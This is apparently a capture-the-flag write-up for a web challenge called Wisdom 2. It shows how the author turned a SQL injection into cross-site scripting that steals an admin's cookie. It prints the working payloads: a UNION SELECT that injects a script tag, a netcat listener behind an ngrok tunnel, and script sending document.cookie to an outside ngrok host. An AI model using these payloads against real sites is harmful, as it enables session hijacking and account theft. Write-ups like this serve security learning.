Challenge

This is the continuation of Wisdom 1.

Solution

In Wisdom 1 we found a SQL injection in the website’s main page. Now let’s take a look at the second page.

The second page asks for a URL which the admin will take a look at :

If you have done CTFs before, you know that this is a classic XSS challenge, so we need to find a way to get a XSS on this website.

Taking another look back at the first page, I noticed that the query was sent through a GET request, meaning the query was in the URL:

After a little bit of googling I learnt that you can leverage a SQL injection into a RCE by adding PHP code inside your SELECT statement to add it to the page !

Sadly, the PHP code kept getting sanitized by the backend, even after trying all the weird sanitization evasion techniques I knew, but it was still worth to try to inject JavaScript instead:

' AND FALSE UNION SELECT "a", "<script>alert()</script>" FROM quotes; -- -

And it worked !

Finally, using ngrok, I could get the admin’s cookie which contained the flag:

nc -lnvp 8000

Listening for incoming connections with nc

sudo ngrok http 8000

Starting ngrok

' AND FALSE UNION SELECT "a", "<script type='text/javascript'>document.location='https://a3ca-132-203-167-165.ngrok.io/?c='+document.cookie;</script>" FROM quotes; -- -

Full SQLi payload that redirects the user to my ngrok link and appends the cookies

The final link looks like:

http://wisdom.ctf.unitedctf.ca?q=' AND FALSE UNION SELECT "a"%2C "<script>document.location%3D'https%3A%2F%2F027f-74-57-165-14.ngrok.io%2F%3Fc%3D'%2Bdocument.cookie%3B<%2Fscript>" FROM quotes%3B -- -

Submitting the link to the admin

Received the flag !

This was a great web challenge, mainly because I learnt that you can leverage a SQLi into a RCE by injection PHP into the page. This wasn’t the point of this challenge, but still very cool chain of exploits !